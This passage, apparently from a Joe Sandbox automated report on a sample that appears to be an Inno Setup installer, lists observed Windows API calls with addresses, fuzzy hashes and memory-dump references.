                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 107509674-3733053543
                                                                            • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                            • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                                            • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                            • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CryptVersion
                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                            • API String ID: 1951258720-508647305
                                                                            • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                            • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                            • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                            • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                            • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                            • String ID: isRS-$isRS-???.tmp
                                                                            • API String ID: 134685335-3422211394
                                                                            • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                            • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                                            • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                            • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                                            APIs
                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                            • SetForegroundWindow.USER32(?), ref: 00457481
                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                            Strings
                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                            • API String ID: 2236967946-3182603685
                                                                            • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                            • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                                            • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                            • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                            • API String ID: 1646373207-3712701948
                                                                            • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                            • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                                            • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                            • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID: ,
                                                                            • API String ID: 568898626-3772416878
                                                                            • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                            • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                            • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                            • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                                            • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                            • String ID:
                                                                            • API String ID: 4011626565-0
                                                                            • Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                            • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                                            • Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                            • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                                            • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                            • String ID:
                                                                            • API String ID: 4011626565-0
                                                                            • Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                            • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                                            • Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                            • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 1177325624-0
                                                                            • Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                            • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                                            • Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                            • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 004833FA
                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$IconicLong
                                                                            • String ID:
                                                                            • API String ID: 2754861897-0
                                                                            • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                            • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                                            • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                            • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                                            • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                            • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                                            • Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                            • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 004241F4
                                                                            • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                              • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021325AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                                            • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                            • String ID:
                                                                            • API String ID: 649377781-0
                                                                            • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                            • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                                            • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                            • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID:
                                                                            • API String ID: 568898626-0
                                                                            • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                            • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                            • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                            • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureIconic
                                                                            • String ID:
                                                                            • API String ID: 2277910766-0
                                                                            • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                            • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                                            • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                            • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 004241AB
                                                                              • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                              • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                              • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                              • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                            • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                            • String ID:
                                                                            • API String ID: 2671590913-0
                                                                            • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                            • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                            • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                            • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                            • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                                            • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                            • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
